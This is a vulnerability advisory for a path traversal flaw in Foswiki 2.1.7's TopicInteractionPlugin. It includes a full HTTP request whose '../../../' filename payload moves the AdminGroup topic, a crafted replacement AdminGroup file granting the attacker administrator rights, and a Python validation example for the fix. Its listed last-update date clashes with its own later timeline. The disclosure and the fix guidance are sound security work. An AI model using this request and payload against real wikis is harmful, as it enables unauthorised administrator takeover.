usd-2022-0014 | Foswiki 2.1.7 Path Traversal

Advisory ID: usd-2022-0014
Product: Foswiki
Affected Version: 2.1.7
Vulnerability Type: https://cwe.mitre.org/data/definitions/23.html
Security Risk: High
Vendor URL: https://foswiki.org
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
Advisory Status: Closed
Last Update: 2022-01-22

Description

The move endpoint of the TopicInteractionPlugin takes the attachment to move from the filename request parameter without restricting it to a bare file name, which allows relative path traversal. The plugin moves attachments between wiki topics. Attachments are stored under the pub/<web>/<topic>/ directory, while the topic text itself, including its access-control settings, is stored under data/<web>/. A filename that goes three directories up leaves the topic's attachment directory and reaches the installation root, so files outside pub/ can be moved as well (e.g. data/Main/AdminGroup.txt, the topic that defines the AdminGroup and thereby who is allowed to reach the backend configuration pages).

Proof of Concept

The following request moves the file AdminGroup.txt of the Main web out of the data/ directory, which effectively removes the group topic. The attacker can afterwards create a new AdminGroup topic and become an AdminGroup member.

POST /bin/rest/TopicInteractionPlugin/move HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 129
Origin: http://localhost
Connection: close
Referer: http://localhost/Main/ChrisChris
Cookie: FOSWIKISID=582be25dd6c36a6d45e6a37277378374; FOSWIKISTRIKEONE=21d8825b6b492836f1235aa0293bc310
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

validation_key=06f78c2c2612a63bf8a8eef6aee71544&id=move&filename=../../../data/Main/AdminGroup.txt&topic=Main.ChrisChris&newweb=Sandbox&newtopic=Test


Afterwards the attacker can create a new AdminGroup topic whose ALLOWTOPICCHANGE setting lists their own username, edit the GROUP setting of that topic and thereby become an administrator.

The following content can be used for the new AdminGroup.txt file (ChrisChris is the attacker's account from the request above):

%META:TOPICINFO{author="BaseUserMapping_999" comment="" date="1648462765" format="1.1" version="1"}%
%META:TOPICPARENT{name="WikiGroups"}%

%INCLUDE{"%USERSWEB%.AdminUser" section="sudo_login"}%

%IF{"(NOT defined GROUP) OR $GROUP = ''" then='
<sticky><div class="foswikiNotification"></sticky>
*How to add the first administrator* %BR%
If you haven\'t previously set up an administrator, follow these steps: (*Note:* This help text will disappear once you have added a user to this group.)
$percntINCLUDE{"%SYSTEMWEB%.InstallationGuide" section="addadmin"}$percnt
<sticky></div></sticky>'}%

More information on Administrators, and on how to use the AdminGroup is found in the [[%SYSTEMWEB%.InstallationGuide#DefineAdminUser][Installation Guide]]

You can edit this topic to add a description to the AdminGroup

%META:PREFERENCE{name="GROUP" title="GROUP" type="Set" value=""}%
%META:PREFERENCE{name="ALLOWTOPICCHANGE" title="ALLOWTOPICCHANGE" type="Set" value="AdminGroup,ChrisChris"}%
%META:PREFERENCE{name="VIEW_TEMPLATE" title="VIEW_TEMPLATE" type="Set" value="GroupView"}%


The ALLOWTOPICCHANGE setting now lists the attacker's username (ChrisChris), so the attacker is allowed to edit the AdminGroup topic and add themselves to GROUP, which makes them an administrator.

Fix

Restrict the movement of attachments to the pub/<web>/<topic> directory: treat the filename parameter as a bare file name (reject path separators and traversal components such as ".."), validate the web and topic names the same way, and verify that the canonicalised target path still lies inside the attachment directory before moving anything.
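The check described above, as an added example that is not Foswiki's or the plugin's own code (the plugin is written in Perl; Python is used here only to illustrate the logic). The installation root /var/www/foswiki, the function names and the sample request parameters are assumptions; the web/topic name rule is a simplification of Foswiki's real naming rules. The sample list contains the advisory's own payload next to a benign attachment name and a traversal attempt via the topic name.

```python
import os
import re

# Simplified name rule for this example: Foswiki's real web/topic naming
# rules are richer, but nothing outside this set is needed for the fix.
_NAME_PART = re.compile(r'^[A-Za-z0-9_]+$')


class TraversalError(ValueError):
    """Raised when a request would touch a path outside pub/<web>/<topic>."""


def _check_name(value, allow_subwebs=False):
    # Web names may contain '/' for subwebs; each component is validated.
    parts = value.split('/') if allow_subwebs else [value]
    if not parts or not all(_NAME_PART.match(p) for p in parts):
        raise TraversalError(f'invalid web/topic name: {value!r}')
    return value


def safe_attachment_path(root, web, topic, filename):
    """Return the canonical path of pub/<web>/<topic>/<filename>, or raise
    TraversalError if the request would escape that directory."""
    web = _check_name(web, allow_subwebs=True)
    topic = _check_name(topic)
    # First check: an attachment name is a bare file name. Separators,
    # traversal components and NUL bytes are rejected before a path is built.
    if (not filename or '/' in filename or '\\' in filename
            or '\0' in filename or filename in ('.', '..')):
        raise TraversalError(f'invalid attachment name: {filename!r}')
    topic_dir = os.path.realpath(os.path.join(root, 'pub', web, topic))
    candidate = os.path.realpath(os.path.join(topic_dir, filename))
    # Second, independent check: after canonicalisation (which also follows
    # symlinks on an existing tree) the target must still be inside topic_dir.
    if os.path.commonpath([topic_dir, candidate]) != topic_dir:
        raise TraversalError(f'{filename!r} resolves outside {topic_dir}')
    return candidate


def is_safe_move(root, web, topic, filename):
    """True if the move request may proceed, False if it must be refused."""
    try:
        safe_attachment_path(root, web, topic, filename)
        return True
    except TraversalError:
        return False


# Constructed request parameters (web, topic, filename); the second entry is
# the payload from the advisory's proof-of-concept request.
ROOT = '/var/www/foswiki'   # hypothetical installation root
SAMPLE_MOVES = [
    ('Main', 'ChrisChris', 'report.pdf'),
    ('Main', 'ChrisChris', '../../../data/Main/AdminGroup.txt'),
    ('Main', 'ChrisChris', '..'),
    ('Main', '../../data', 'Main.txt'),  # traversal via the topic name
]


def demo():
    """Evaluate every sample request; maps (web, topic, filename) -> allowed."""
    return {params: is_safe_move(ROOT, *params) for params in SAMPLE_MOVES}


if __name__ == '__main__':
    for (web, topic, filename), allowed in demo().items():
        verdict = 'allow' if allowed else 'reject'
        print(f'{verdict:6} web={web} topic={topic} filename={filename}')
```

The bare-name check alone already stops the advisory's payload; the realpath/commonpath comparison is kept as an independent second layer so that a later change to the name rules, or a symlink planted inside pub/, cannot silently reopen the hole.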

References

https://owasp.org/www-community/attacks/Path_Traversal

Timeline

  • 2022-01-05: Vulnerability identified by Christian Pöschl
  • 2022-04-27: First contact request made to the vendor
  • 2022-05-05: Second contact request made to the vendor
  • 2022-06-09: Vulnerability details shared with the vendor
  • 2022-06-09: Fix released by vendor

Credits

This security vulnerability was found by Christian Pöschl of usd AG.